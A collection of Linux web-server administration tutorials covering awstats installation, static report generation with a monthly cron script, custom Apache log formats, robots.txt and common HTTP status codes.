Something you'll notice if you leave awstats running the way we've set it up is that the reports being generated only go into detail for the current month. Dividing the information up by month is a decent interval, but you may want to look at previous months in detail instead of only the current one.

So it's entirely optional, but if you'd like to keep monthly reports around it's really just a matter of tailoring a shell script to fit your site.

A cron script


We'll name the script after the awstats config file for the site in question and put it in the cron monthly directory. Using "www.example.com", we would create the file:
/etc/cron.monthly/awstats.www.example.com

Inside the file put the following script:
#!/bin/sh
#
# Run the awstats build script to generate a report for last month.
#

# Modify these 3 variables for your environment:
#
# The location of the awstats installation
AWSTATSDIR=/usr/local/awstats

# Your main domain, as you reported it to awstats
DOMAIN=www.example.com

# The directory where you're storing the reports for this domain
REPORTDIR=/home/demo/public_html/example.com/public/webstats

LASTMONTH=`date -d "last month" +%B`
LASTMONTHNUM=`date -d "last month" +%m`
LASTMONTHDIR=$REPORTDIR/$LASTMONTH

mkdir -p $LASTMONTHDIR
cp -Rf $AWSTATSDIR/wwwroot/icon $LASTMONTHDIR/awstatsicons

$AWSTATSDIR/tools/awstats_buildstaticpages.pl -month=$LASTMONTHNUM -update -config=$DOMAIN -dir=$LASTMONTHDIR -awstatsprog=$AWSTATSDIR/wwwroot/cgi-bin/awstats.pl > /dev/null

Change the values of "AWSTATSDIR", "DOMAIN", and "REPORTDIR" to match your environment and site.

After saving the file make your new script executable:
sudo chmod a+x /etc/cron.monthly/awstats.www.example.com

You can even run that script now to test it (and to get a detailed report for last month's data, if you have some). If you do, be sure to run it using sudo.

What it does


When the script runs it creates (if it doesn't already exist) a directory named after last month. If the current month is September, the directory will be named "August" (or the equivalent for your machine's locale setting). The awstats icons directory will be copied there, then a report will be generated for last month and put in the month's directory.

To look at a monthly report you'll use a similar URL to viewing the current report, but you'll insert the name of the month you want to view in front of the page name. The first letter of the monthly directory names is capitalized, so it will have to be capitalized in the URL used to visit a monthly report as well.

To take our example URL from earlier and use it to look at the August statistics we would change it to:
http://www.example.com/webstats/August/awstats.www.example.com.html

Keeping more monthly reports


Note that, as the script is written, each monthly report gets replaced every year (since reports are filed by month name only, not by year).

If you want monthly reports to never get overwritten you can modify the script to add the year to the directory names. Change the line that defines "LASTMONTH" above to something like:
LASTMONTH=`date -d "last month" +%B-%Y`

If the month were September, the above line would cause the script to use the directory name "August-2010".
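You can check what name the date command will produce without waiting for a month to roll over. A quick sketch with a pinned base date and locale (GNU date is assumed, since that is what Linux ships):

```shell
# LC_ALL=C pins English month names for %B, and an explicit base date
# makes the result reproducible: "last month" from mid-September 2010.
LC_ALL=C date -d "2010-09-15 last month" +%B-%Y
# Prints: August-2010
```

Without the -%Y suffix, the same command reproduces the original script's plain "August" directory name.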

Further reading


You have a solid but basic installation of awstats now. If you want to get more out of awstats there are a few advanced features you can look into.

For starters, you can browse the awstats documentation online.

If you want to generate reports on the fly you can do so by setting up the main awstats.pl script to run as a CGI script from a web browser. It would be a good idea to still run the stats update through a schedule. You'll want to be familiar with using CGI with a web server, and be aware of the risks that can be involved (for both performance and security). Then check the awstats install docs and take a look at the script they provide for automating aspects of that configuration.

If you want to extend awstats there are plugins available on the project's web site. A couple of the more interesting ones let awstats determine the country of origin of visitor IP addresses without launching a lot of cumbersome DNS lookups.

With a little tweaking and help from the documentation, awstats can also be used to build reports for mail and FTP servers.

Digging through all the options in the config file will give you an idea of what sorts of changes you can make to reports and their formatting.

Generating and viewing awstats reports



Now that awstats is installed we take a look at actually running the analysis and viewing the reports.




Awstats in action


If you followed along with the first part of this series you should have awstats installed and configured for your site. In this article we'll look at a simple approach to report generation from the command line.

This approach will create static html pages to display your web traffic.

Build a report


Time to tell awstats to generate your reports. Fortunately for our "start with something simple" approach, there's a script that rolls generating several reports into one step.

awstats_buildstaticpages.pl


We're going to use a script that's included with awstats, "awstats_buildstaticpages.pl". This script updates the stats and generates a bunch of standard reports, using the main "awstats.pl" script behind the scenes. For a closer look at what reports this script will build, check the awstats online documentation.

For our example the command would look like:
sudo /usr/local/awstats/tools/awstats_buildstaticpages.pl -update -config=www.example.com -dir=/home/demo/public_html/example.com/public/webstats -awstatsprog=/usr/local/awstats/wwwroot/cgi-bin/awstats.pl

Okay, yeah. I admit that's kind of long. But it's not as scary as it seems, honest. Especially since you won't have to memorize it.

Let's break that down so you know what to put where.

The script itself


/usr/local/awstats/tools/awstats_buildstaticpages.pl

This part is the script we're running, "awstats_buildstaticpages.pl". If you installed to a location other than "/usr/local/awstats" you'll want to change this part to point to the actual location of the script on your machine.

The -update option


-update

Including "-update" at the beginning of the options tells the script to update the stats analysis before generating the reports.

The -config option


-config=www.example.com

The "config" value should be the main domain name for the site. Note that this domain matches up with the name of the config file you created in the first part of this series. The name of your config file should have "awstats." before the main domain name, and ".conf" after it, since that's pretty much what this script will be looking for.

In short, replace "www.example.com" with your main domain name.

The -dir option


-dir=/home/demo/public_html/example.com/public/webstats

The "-dir" option refers to the directory where you want awstats to create its reports. That directory should contain an "awstatsicons" directory containing awstats' standard image files.

The -awstatsprog option


-awstatsprog=/usr/local/awstats/wwwroot/cgi-bin/awstats.pl

For "-awstatsprog" you'll want the value to be the location of the "awstats.pl" script, which is the main awstats script. If you installed awstats someplace other than "/usr/local/awstats", adjust accordingly.

The script's results


Once you run that big command (all on one line) you should see that the script launches the awstats update process, then tells you about every one of the 20 reports it's generating.

If the script encountered an error it should give you some troubleshooting advice (like making sure you used the right "config" identifier).

Note that the last line, the "Main HTML page" line, gives the main page of the report.

If you take a look in your reports directory you should now see a bunch of html files there:
$ ls /home/demo/public_html/example.com/public/webstats                              
awstats.www.example.com.alldomains.html
awstats.www.example.com.allhosts.html
...

View the report


Now we get to see the results of our hard work. Point your browser to the "main html file" that was identified by the script we ran to generate the report.
http://www.example.com/webstats/awstats.www.example.com.html

The important part here is working out the address you'll use to view the reports. If you discover at this point that you created the reports in a directory you can't see from a browser, you may want to make a new reports directory. Edit your awstats config file accordingly, then run the report generation again to make sure it works with the new directory.

If all goes well you'll see something like:

Awstats example

(Without the smudges, of course.)

You might see less than a day's worth of traffic in this initial report, or perhaps a week, depending on how often your web logs are rotated. So not a lot that's interesting just yet, but enough to make sure the reports were generated properly.

Visits, hits, pages and bandwidth


There are a bunch of reports available, linked at the top of your main report's page. The main statistics you'll see at the beginning of the report bear some quick explanation, just so you know what you're looking at.

Unique visitors


The "unique visitors" stat tracks the number of different visitors your site received. For awstats this mostly means the number of unique IP addresses it saw in your web logs. This number isn't perfectly accurate, since visitors behind proxy servers and home routers can throw it off a bit (since those visitors would only appear in your web logs under the IP addresses belonging to the proxies or routers).

Number of visits


This stat tracks how many times visitors came back to the site. A "visit" for these purposes will encompass all page hits from a visitor within an hour or so of each other. If the same IP address appears in the web logs the next day that would count as a second visit.

Pages


A "page", in web traffic terms, is the main page of a visited URL. This would be the HTML or PHP file that was requested by the visitor. If a page includes the contents of other HTML files, only the main page is counted as a "page" in the traffic stats.

Hits


Pretty much everything a web browser asks for from a site is a "hit". The main page, headers and footers, images, videos — everything the browser has to ask for is a hit. A complex site will produce a fair number of hits per page visit.

Bandwidth


In the combined log format the web server records the size of all the requests and responses that get sent between the browser and the server. The total of all the outgoing response sizes is the "bandwidth" statistic in awstats. This is not necessarily the total bandwidth used by the site — it's just the total bandwidth that got recorded in your web server's access logs.
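You can sanity-check this figure against the raw log yourself: the bandwidth number is just the sum of the response-size field, which is the tenth whitespace-separated field in a combined-format line. A sketch using a couple of fabricated log entries:

```shell
# Two sample combined-format entries (made up for illustration)
cat > /tmp/access.log.sample <<'EOF'
1.2.3.4 - - [23/Aug/2010:03:50:59 +0000] "GET / HTTP/1.1" 200 512 "-" "curl/7.0"
5.6.7.8 - - [23/Aug/2010:03:51:02 +0000] "GET /a.png HTTP/1.1" 200 1024 "-" "curl/7.0"
EOF

# Sum field 10 (the response size); a "-" means no body was sent, so skip it
awk '$10 != "-" { total += $10 } END { print total }' /tmp/access.log.sample
# Prints: 1536
```

On a real log the total should match awstats' bandwidth stat for the same period, give or take entries awstats filters out.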

A note about referer spam


You may notice that the "referer" information in your reports contains links to referring web sites. This is useful for checking out sites that are linking to you but there's a potential drawback to putting this information on a web page, and that's "referer spam".

There's a school of thought among less-reputable web admins that encourages doing whatever you can to increase your search engine ratings. One of those tactics involves finding a site with a publicly-accessible web stats page and then running a script that visits the site a bunch of times using their web site as a referrer. The theory is that search engines will count the stats page as another site linking to their site.

In practice it doesn't work that well (most major search engines are wise to the practice and account for it), but that doesn't mean we should encourage the inconsiderate jerks to keep trying it.

The preferred method to keeping the stats pages from being used for spamming purposes is to protect the stats directory from unauthorized access. You can do that by password-protecting that part of the site, or by restricting access to that site to just localhost and using ssh tunneling to view your stats.

If you want to keep your stats public you should at least modify your site's "robots.txt" file to tell the major search engines not to index your stats pages. If you don't have a robots.txt file in the document root of your site this is a good time to create one.

Inside the robots.txt file you just need to add a "Disallow" rule for the web stats directory. If you don't have a robots.txt file already, you can use something like the following:
User-agent: *
Disallow: /webstats/

That would tell any robot that complies with the robots.txt file not to index the "webstats" part of the site. That way your stats site won't show up on major search engines at all, defeating the purpose of any efforts to manipulate your referers report.

If you want your web stats to show up on search engines for some reason, then at least tell robots not to index the referer page report:
User-agent: *
Disallow: /webstats/awstats.www.example.com.refererpages.html

How to Install awstats on Linux



The awstats program is a versatile tool for generating web traffic reports. We'll walk through a simple installation to track stats for your site.




Web log analysis


If you run a web site you might get curious about statistics like how many people visit your site each month and what sites or search engines they used to find you. That's where web traffic analysis comes in.

There are many options for analyzing your traffic, but in this article series we'll look at a program called "awstats". Awstats runs through your web logs (which are lying around on the disk anyway) and generates reports based on what it finds. The reports break down the data to show you information like what the more popular parts of your site are, what search terms people used to get there, and which search engines have spidered your site lately.

We'll aim for a simple approach to analyzing logs with awstats in this series. There are some nifty features of awstats we won't be using (like dynamically generating reports via CGI), but the benefit of this approach is that it's light on resource use and easy to set up no matter what web server you use.

Why not just use page tagging?


A different approach to web traffic analysis is called "page tagging", used by services like Google Analytics. It involves embedding a javascript tag in your pages that causes visiting web browsers to report their visit to a master data server. Because the browser can also set a cookie to go along with the javascript, a page tagging approach can give you very good data about what individual users are up to with regards to your site.

The approach awstats uses is called "log analysis". The analyzer program goes through your web logs line-by-line and sorts out what files got served and where the requests came from. Because this approach doesn't rely on the visiting web browser executing any specific code properly, the total-traffic numbers a log analyzer gathers will be closer to an accurate tally. The downside is that the only identifying information recorded about a visitor is the IP address they used, which isn't always a reliable way to distinguish between users (since several of them could be behind the same proxy server or firewall).

In the end, neither approach is really superior to the other.

Page tagging gives you better information about how often visitors return to your site and what they do there, but doesn't record visitors that can't or won't execute the tag (like older browsers, many mobile phones, users with privacy concerns, and search engine robots).

Log analysis gives you better information about how much traffic your web server handles but is less reliable when it comes to determining site usage patterns.

See where I'm going? Both approaches have complementary strengths and weaknesses. Somewhere between the page tagging statistics and the web log analysis lies the whole picture.

For the most accurate assessment you'll want to have both types of usage reports available and extrapolate from there.

Prerequisites


Before installing awstats pick out the virtual host you want to report on. If you want to use more than one you can go through this guide again for each one, but make sure each virtual host is logging to its own access log. It's possible to use a single log for multiple sites, but it's more complicated and isn't recommended. We're going for simple, remember?

Web server


First make sure you have a web server. Hey, might as well be thorough.

With that out of the way, we want to see if the virtual host we're going to be tracking is logging in the right format. While awstats can handle some other log formats, what we want to use is the standard "combined" web log format.

Most web servers, like nginx or lighttpd, use the combined log format by default. No problems there unless you went out of your way to change it.

If you're using apache it might be logging in either a "combined" or a "common" log format. To find out which, take a look in your virtual host config file and look for the "CustomLog" directive:
CustomLog /var/www/access.log combined

That last word is the one to check for the format. If it isn't there, or if it says something like "common", change the config so it's using "combined" for the format instead. For more information on the combined log format, check out this article for apache or this article for nginx.

If you altered the format used for the virtual host's log remember to reload the web server to implement the change.

Perl


The awstats scripts use a scripting language called "perl". It's used for a lot of things, so you probably have it installed already.

To check, run the command:
perl -v

If you get a response that gives you a perl version, you're set. If you get a "command not found" error then you need to install perl. You should be able to do that through your distribution's package manager, like yum or aptitude.

Download and extract


We're actually not going to use your Linux distribution's pre-packaged version of awstats (even if it has one). The awstats program gets updated regularly, and new versions include data on the latest web browser and operating system identifiers. It's best if you install the source package for awstats, then manually update it regularly so you get the most accurate reports possible.

You can get the latest version of awstats from the project's download page. You can decide if you want the latest beta for cutting-edge reporting data, or if you want to get the latest stable version instead and play it safe. In this guide we used the latest stable version (6.95 at the time of this writing).

Get the download with the ".tar.gz" extension. It's more unixy, and saves you from checking script permissions after the install.

You can either download the package from the awstats site to your desktop and then upload it to your VPS with scp, or you can download it directly to the VPS if you have wget installed:
wget http://prdownloads.sourceforge.net/awstats/awstats-6.95.tar.gz

Once you have the package on your VPS, unpack it:
tar -xvzf awstats-6.95.tar.gz

You should end up with a directory named after the awstats version, like "awstats-6.95". Now you just need to move that to wherever you actually want awstats installed (I used /usr/local/awstats):
sudo mv awstats-6.95 /usr/local/awstats

If you want to update to another version of awstats later, just go through those steps with the new version. Replace the old "awstats" directory with the new one. Simple.

Choose the reports directory


Next you'll need to create an output directory for your reports. This can be pretty much anywhere you like, since the reports are just static html pages. They just need to be accessible from your web browser if you want to view them.

For this example, let's say we're going to be tracking traffic for "www.example.com", and we put that site's files in a directory in the "demo" user's home directory. We're feeling unoriginal, so we'll make a "webstats" directory for awstats' reports:
mkdir -p /home/demo/public_html/example.com/public/webstats

The awstats icons


The html pages that awstats creates when it makes its reports want to use some images to make them a bit less bland. Let's make sure a copy of those images will be available to the reports we generate:
cp -R /usr/local/awstats/wwwroot/icon /home/demo/public_html/example.com/public/webstats/awstatsicons

When you update awstats you may want to re-copy this directory as well, to catch any additions (like icons for new browsers).

Create the data directory


We'll need to give awstats a directory where it can store the data it uses to generate its reports. The default is "/var/lib/awstats". That's a pretty good location.
sudo mkdir -p /var/lib/awstats

Copy the config template


Now to set up a config file telling awstats how to process the logs for your domain. First, create a directory to hold the config:
sudo mkdir -p /etc/awstats

Next we'll copy a template config file into that directory that we can modify for our domain.

The template config file is located in the awstats installation's wwwroot/cgi-bin directory:
[awstats install]/wwwroot/cgi-bin/awstats.model.conf

Name the new config file in the style of "awstats.[main domain name].conf". If you were creating a config for "www.example.com" and had installed awstats to "/usr/local/awstats", your copy command would look like:
sudo cp /usr/local/awstats/wwwroot/cgi-bin/awstats.model.conf /etc/awstats/awstats.www.example.com.conf

Customize the configuration


Time to dig around in the config file we created. Using your favorite text editor (nano or vi, usually), edit:
/etc/awstats/awstats.www.example.com.conf

Change "www.example.com" above to the name of the domain you'll be tracking. If the file doesn't exist you may have made a typo when you copied it. The file should be chock full of stuff right now.

Fortunately, part of keeping things simple is only needing to change a few config settings, and those are toward the beginning of the file. Let's look at the settings you'll need to pay particular attention to and their default values.

LogFile


LogFile="/var/log/httpd/mylog.log"

The LogFile value is a pretty important one — it tells awstats where to find the log it's supposed to be analyzing. For our example, we'd change that value to the location of example.com's access log:
LogFile="/home/demo/public_html/example.com/log/access.log"

LogFormat


LogFormat=1

The LogFormat directive is probably not one you'll need to change, but I mention it in case you've got your domain logging in a custom format, or if you absolutely want to use another standard format like the common log format. The commented text that precedes this directive explains how you can tell awstats what your log format looks like.

There are also some predefined log formats. The default, "1", represents the combined log format. If you are using common log format you would use "4" here instead.

SiteDomain


SiteDomain=""

The SiteDomain value is where you tell awstats what your site's main domain name is. If we usually direct visitors to "www.example.com", we'd change this setting to:
SiteDomain="www.example.com"

HostAliases


HostAliases="localhost 127.0.0.1 REGEX[myserver\.com$]"

The HostAliases setting tells awstats all the different domains people might use to visit your site. It's there so it can separate external referring sites from internal links.

The default has some funky "REGEX" stuff in there — that describes a "regular expression", which is a flexible but daunting way to describe a search filter. The one above just matches host names ending in "myserver.com", for instance. We're not going to keep that. Regular expressions aren't simple (but they are useful, if you know how to use them).

All you really need for this setting is a list of domains. It's good to include "localhost" and "127.0.0.1" in there, and to throw in your main domain name and any alternates you have for the site separated by spaces:
HostAliases="www.example.com example.com www.olddomain.com olddomain.com localhost 127.0.0.1"

DNSLookup


DNSLookup=2

The DNSLookup setting is actually not one you'll want to change. At its current setting it means that awstats won't do DNS lookups on visitors' IP addresses. What awstats might glean from that information is what country the visitor is in. This can be nice to know and chart, but not nice enough for the amount of time and effort it can take awstats to make all those DNS queries.

If you really want country data for visitors, check the awstats plugin site for a couple alternatives to DNS lookup. They have an impact on awstats performance as well, but not as much as straight DNS lookups.

DirData


DirData="/var/lib/awstats"

Remember that data directory you made? This is where you tell awstats what it was. If you didn't use "/var/lib/awstats", be sure and change this value to point to your data directory.

DirIcons


DirIcons="/awstatsicons"

When the generated reports reference images they do so using this value. That directory is relative to the location of the reports. In this case, it will point to the "awstatsicons" directory we made by copying the default images directory. If you want to rename that directory you'll need to change it here so the generated reports can find the images.

Customizing apache web logs



You can create your own custom formats for apache web logs, to record more information or to make them easier to read. Here's how.




Changing the log format


If you know how to read web logs then you may have an idea of how you would want to write them differently — maybe add a little here, trim a little out there, switch the order around a bit. Luckily, you can do that with the access logs through a couple built-in commands and a handful of log variables.

LogFormat


Apache's "LogFormat" directive is what lets you define your own access log setup. Let's look at how that directive would be used to define the "combined" log format:
LogFormat "%h %l %u %t \"%r\" %>s %b \"%{Referer}i\" \"%{User-Agent}i\"" combined

That first argument, in quotes, is the string that describes the log format. The last argument, "combined", gives a nickname to the format that can be used by CustomLog later on.

That format string contains a bunch of placeholders that describe the data to be included in the log. That first one, for example, is "%h" and represents the IP address of the visitor (the identifier for their host). A bit further on, "%t" represents the time of the request.

Components of the combined format


Let's look at that combined format string side-by-side with an access log entry in that format:
%h %l %u %t \"%r\" %>s %b \"%{Referer}i\" \"%{User-Agent}i\"
123.65.150.10 - - [23/Aug/2010:03:50:59 +0000] "POST /wordpress3/wp-admin/admin-ajax.php HTTP/1.1" 200 2 "http://www.example.com/wordpress3/wp-admin/post-new.php" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_4; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.25 Safari/534.3"

Okay, they don't look too pretty together, but there is a correlation between each element in the format string and the components of the log entry below it. Breaking down what the stuff in the format string means:
%h The remote host
%l The remote logname (usually just "-")
%u The authenticated user (if any)
%t The time of the access
\"%r\" The first line of the request
%>s The final status of the request
%b The size of the server's response, in bytes
\"%{Referer}i\" The referrer URL, taken from the request's headers
\"%{User-Agent}i\" The user agent, taken from the request's headers

So reading along, we see that in place of "%h" is "123.65.150.10", the remote host. And after that, "%l" becomes "-" for the remote logname, "%u" turns into "-" for the remote user (since this connection didn't require authentication), "%t" is replaced with "[23/Aug/2010:03:50:59 +0000]" because it's the time the request was sent, and so on.

Note that wherever a quote character (") appears in the log format, it was escaped in the format string with a backslash (\"). The escape is there because a bare quote would tell LogFormat that the format string was complete at that point. The backslash tells it to keep reading.

The last two parts of the format, the referrer and the user agent, use a format component that requires an argument — in this case which header should be extracted from the request by %i. The referrer and user agent headers are, appropriately, named "Referer" and "User-Agent", respectively.

Well, mostly appropriately. "Referer" is misspelled. That's the spelling used for the header name in the HTTP standards, however, so it is "Referer" for all time when talking about web link referrers. A bit of spelling trivia for you there. Enjoy.
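To see that correspondence programmatically, here's a quick shell sketch (the log line is a shortened, hypothetical entry, not from a real server) that pulls a few combined-format fields out with awk; splitting on the quote character isolates the request line, and the third quote-delimited chunk holds the status and size:

```shell
# A hypothetical combined-format entry (referrer and user agent shortened).
line='123.65.150.10 - - [23/Aug/2010:03:50:59 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 2 "http://www.example.com/" "ExampleBrowser/1.0"'

# %h is simply the first space-separated field.
host=$(echo "$line" | awk '{print $1}')

# Splitting on double quotes: field 2 is %r, and field 3 holds "%>s %b".
request=$(echo "$line" | awk -F'"' '{print $2}')
status=$(echo "$line" | awk -F'"' '{split($3, a, " "); print a[1]}')

echo "$host requested \"$request\" and got status $status"
```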

Other format components


Apart from what we saw in our breakdown of the combined log format, there are other components you can include in a LogFormat entry. Some commonly-used components are:
%{cookie}C

The contents of the cookie named "cookie" for the request.
%{header}i

The contents of the HTTP header named "header" for the request.
%{VAR}e

The contents of the environment variable "VAR" for the request.
%k

The number of keepalive requests handled by the connection that spawned the logged request. The first time a request is sent the keepalive value will be zero, but each subsequent request that uses the same keepalive connection will increase that number by one. This can be handy for seeing how many requests a keepalive connection handles before it's terminated.

If keepalives aren't enabled this value will always be zero.

If you only see very low numbers for the keepalives value in a log but have a long keepalive timeout set, then it may be worth trying a much shorter timeout for keepalives. That way apache won't be maintaining connections in memory for longer than it needs to.
%T

How long the server took to serve the request, in seconds.
%v

The ServerName of the virtual host the request was sent to. This format code can be handy if you're writing the accesses of more than one virtual host to the same log file.

For a full list of format components see the apache documentation for LogFormat.
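As an illustration of those components in use (this format string and its nickname are made up for the example, not something apache ships with), a format recording the virtual host name and keepalive count might look like:

```apache
LogFormat "%v %h %t \"%r\" %>s %b %k" vhost_keepalive
```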

Make your own log format


While the LogFormat entry is useful for interpreting what appears in the logs, it can also be used to create your own formats.

If you want your log's access entries to include how long each request took to serve, you might make a LogFormat directive that looks like:
LogFormat "%h %l %u %t \"%r\" %>s %b \"%{Referer}i\" \"%{User-Agent}i\" %T" timed_combined

All we have to do is add a "%T" to the end of the format string, then give it a new nickname — for our example, "timed_combined".

Using the new log format


Now, if you want to tell your virtual host to make an access log using the new format, you can include in the virtual host definition:
CustomLog /var/log/apache2/timed.log timed_combined

To recap: A LogFormat directive takes a format you give it and assigns it a nickname you choose. Then you use CustomLog to tell apache to write the access log using the new format by telling it where to write the log and the nickname of your log format.
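Putting the two directives together, a minimal virtual host sketch might look like the following; the domain, paths, and port are placeholders:

```apache
LogFormat "%h %l %u %t \"%r\" %>s %b \"%{Referer}i\" \"%{User-Agent}i\" %T" timed_combined

<VirtualHost *:80>
    ServerName www.example.com
    DocumentRoot /var/www/example
    # Write this vhost's accesses using the format nicknamed above.
    CustomLog /var/log/apache2/timed.log timed_combined
</VirtualHost>
```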

Adding more custom logs


You can have more than one CustomLog directive for a virtual host. If you already have a CustomLog using the "combined" format, you don't have to remove it when adding your "timed_combined" log. This can be useful if you want to maintain one log in CLF that a web log analyzer program can read and another log file with just the information you care about when you're skimming the entries.

So if you wanted another log with just the stuff you wanted in it, you might take that "timed_combined" format and remove the things you feel are distractions. If you decided to remove the remote log entry, the user entry, and the user agent entry, you could create that format with:
LogFormat "%h %t \"%r\" %>s %b \"%{Referer}i\" %T" slim

And then add a new CustomLog directive to use the "slim" format:
CustomLog /var/log/apache2/slim.log slim

Precedence


Note that any logs defined in a virtual host will override log directives in the main apache config file. So if the main config file has the CustomLog entry:
CustomLog /var/log/apache2/access.log combined

And the virtual host has another CustomLog entry:
CustomLog /var/log/apache2/example.com.log combined

Then the virtual host will log its accesses to the "example.com.log" file, but not to the "access.log" file. If you wanted accesses to be logged to both files, you would need to include a line for the main access.log file in the virtual host definition, as in:
CustomLog /var/log/apache2/access.log combined
CustomLog /var/log/apache2/example.com.log combined

Rotating new logs


When you create any new logs, you should remember to configure logrotate to rotate them regularly. Otherwise they may grow and grow until they eat all your disk space right up. Any logs in the default apache log directory should get rotated under apache's default rules, but if you put a new log in another directory you may need to add a rule to logrotate.
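As a sketch of what such a rule might look like (the path, schedule, and retention count here are assumptions; adjust to taste), you could drop a file like this into /etc/logrotate.d/:

```conf
# Hypothetical rule for custom apache logs kept outside the default directory.
/var/log/apache-custom/*.log {
    weekly
    rotate 12
    compress
    delaycompress
    missingok
    notifempty
    postrotate
        # Reload apache so it reopens the rotated log files.
        /etc/init.d/apache2 reload > /dev/null 2>&1 || true
    endscript
}
```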

Interpreting common status codes in web logs



The status codes you find in your web logs are useful troubleshooting tools, but only if you know what they mean.




Status codes


When a web browser talks to a web server, the server lets the client know the status of its request by sending a "status code". This status code will show up in the access logs of the server as a number. There are a lot of different status codes that can be passed to a web client, and you can view the full list on the W3C's website.

Fortunately there are only a few status codes that you're likely to see in your access logs, so consider the following descriptions to be highlights from the full list of status codes.

200 - OK


The 200 status code indicates that the request was successful. This is the one you want to see in your logs. At its most basic it means that when a web browser asked for a file, the server was able to find it and send it back to the browser.

403 - Forbidden


The 403 status code indicates that the server is not allowed to respond to the web client's request.

One circumstance that can cause a 403 status is if you do not have "Indexes" enabled for a directory, and the directory doesn't contain an index file that the server can access. In other words, the client asked for a directory, and the server found nothing there it could show to the client.

A more common circumstance is that the permissions on the file or directory being requested don't allow access by the web server's user. If the web server is running as user "www-data", any files you want the web server to serve will have to be accessible by the user "www-data". For example, if a directory's permissions look like:
drwx------ 5 root     root     4096 2009-12-18 01:39 wordpress

Then the user "www-data" will not be able to access any of the files inside. Requests sent to the server that ask for the "wordpress" directory or any of its contents will yield 403 status codes instead of serving the file requested.

For more information on how Linux file permissions work, you can read this article series. In a nutshell, the web server user needs to have read permission for files in order to serve them, and it has to have read and execute permissions for directories in order to see files inside them.
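A quick shell sketch of the fix (the paths here are hypothetical; substitute your own document root, and note the server's user gets access via the "other" permission bits in this example):

```shell
# Reproduce the problem: a directory the web server user can't enter.
mkdir -p /tmp/demo-docroot/wordpress
touch /tmp/demo-docroot/wordpress/index.php
chmod 0700 /tmp/demo-docroot/wordpress

# The fix: directories need read+execute for the server's user,
# and files need read.
chmod 0755 /tmp/demo-docroot/wordpress
chmod 0644 /tmp/demo-docroot/wordpress/index.php

stat -c '%a' /tmp/demo-docroot/wordpress    # prints 755
```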

404 - Not found


A 404 status code means that the requested file could not be found. If you see this error often you should check the links on your site to make sure they're pointing to the right places.

Since Linux filesystems are typically case-sensitive, you should also make sure the capitalization matches between the request in the URL and the name of the file on the disk. For example, if a file is named "File.txt" and the URL requests "file.txt", the file won't be found by the web server. Either the URL or the file name would need to be changed so the capitalization matches in both instances.

A couple commonly-requested files are worthy of note.

robots.txt


If you see 404 errors connected to a file named "robots.txt", that's the result of a spider program (like web search engines use) checking to see what your preferences are for indexing your site.

If you don't want to restrict the access of web spider robots to your site, you can just create an empty robots.txt file and the 404 errors will go away.

The robots.txt file can be useful if there are parts of the site that you want search engines to ignore. If you don't want search engines to record anything in the "orders" or "scripts" directories on your site, for example, you could use the following robots.txt file:
User-agent: *
Disallow: /orders/
Disallow: /scripts/

A slash at the end of a disallow will let the search engine robot know that it refers to a directory.

The "User-agent" part of the file describes what user agent the robots.txt would apply to. The "*" means that you want the rule to apply to everybody. You can have more than one User-agent entry in a robots.txt file, as in:
User-agent: EvilSearch
Disallow: /

User-agent: *
Disallow:

In that file, the EvilSearch engine's robot would be asked not to record anything on the site (thus the "/"), while all other robots would be allowed to record anything they can find (which is what the empty argument to Disallow means).

Note that the robots.txt instructions aren't enforced in any way. A spider can freely ignore them. The better search engines (the ones you've heard of) tend to obey the robots.txt file, while spiders used by spammers and email harvesters will ignore robots.txt entirely.

favicon.ico


Any 404 errors connected to "favicon.ico" are the result of a web browser checking for a favorites icon for the site. That's another file not found error that can be safely ignored if you don't want to make a favorites icon for the site.

The favorites icon is often used by modern browsers both as an icon in a bookmarks list and as an identifying icon in a tabbed interface. If you've noticed that bringing up a site puts an image associated with the site next to your address bar or in the tab for that page, the favicon.ico file is where your browser got that image.

There are ways to point a browser to another file for the favorites icon, but if you want to make a quick-and-dirty favorites icon there are several utilities on the web that either allow you to create your own or convert an image file. Once you've generated the favicon.ico file you can upload it to the document root of your site and the associated 404 errors should stop appearing in your log.
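One common way to point browsers at a different icon file is a link tag in the page's HTML head; the filename and path here are placeholders:

```html
<link rel="icon" href="/images/site-icon.png" type="image/png">
```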

500 - Internal server error


The 500 status code is kind of a catch-all error code for when a module or external program doesn't do what the web server was expecting it to do. If you have a module that proxies requests back to an application server behind your web server, and the application server is having problems, then the server could return a 500 error to web clients.

503 - Service unavailable


The 503 status code appears when the web server can't create a new connection to handle an incoming request. If you see this status code in your logs it usually means that you're getting more web traffic than can be handled by your current web server configuration. You'll then need to look into increasing the number of clients the server can handle at one time in order to be rid of this status code.